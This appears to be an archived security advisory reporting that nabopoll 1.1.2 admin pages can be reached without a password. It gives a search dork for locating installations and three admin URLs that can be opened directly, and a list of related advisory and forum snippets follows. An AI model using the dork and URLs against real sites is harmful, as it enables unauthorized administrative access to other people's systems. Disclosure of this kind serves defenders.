nabopoll 1.1.2 sensitive file (admin without password)

* nabopoll 1.1.2 sensitive file (admin without password)

* By : sn0oPy

* Risk : high

* site : http://nabocorp.com/

* Dork : inurl:"nabopoll/"

* exploit :

acces without password to :

http://target/nabopoll/admin/config_edit.php
http://target/nabopoll/admin/template_edit.php
http://target/nabopoll/admin/survey_edit.php

* contact : sn0oPy@xxxxxxxxxxxxxxxxxxxxxxx

* greetz : [subzero], Avg Team(forums.avenir-geopolitique.net).

http://forums.avenir-geopolitique.net/viewtopic.php?t=2643

Relevant Pages

BTSaveMySql 1.2 (acces to config files)
... BTSaveMySql 1.2 (acces to config files) ... By: sn0oPy ... Risk: low ... to have all acces to the config and save files. ...
(Bugtraq)
Allons_voter Version 1.0 xss and admin votes
... Allons_voter Version 1.0 xss and admin votes wihtout password ... By: sn0oPy ... Risk: medium ...
(Bugtraq)
Re: Regular User with Server Installed - Is it a security risk?
... It may be a risk, but not in the way you seem to be considering. ... If the user is only a domain user, not a domain admin nor an ... admin on any member machine, then their actions will be limited. ... Some server tools may show them more than they would simply ...
(microsoft.public.windows.server.security)
Re: BF2142 includes spyware? Maybe...
... to give the game admin level access. ... Running an Admin account for using the Internet carries more risk than ... The problem I personally have with broad statements like "security ...
(comp.sys.ibm.pc.games.action)
Re: Defautl Hidden Shares
... Even though it's the "local" administrator ... Enter the local admin password at prompt and you now have full admin access ... It's an even bigger risk if you left the local admin password blank... ...
(microsoft.public.win2000.security)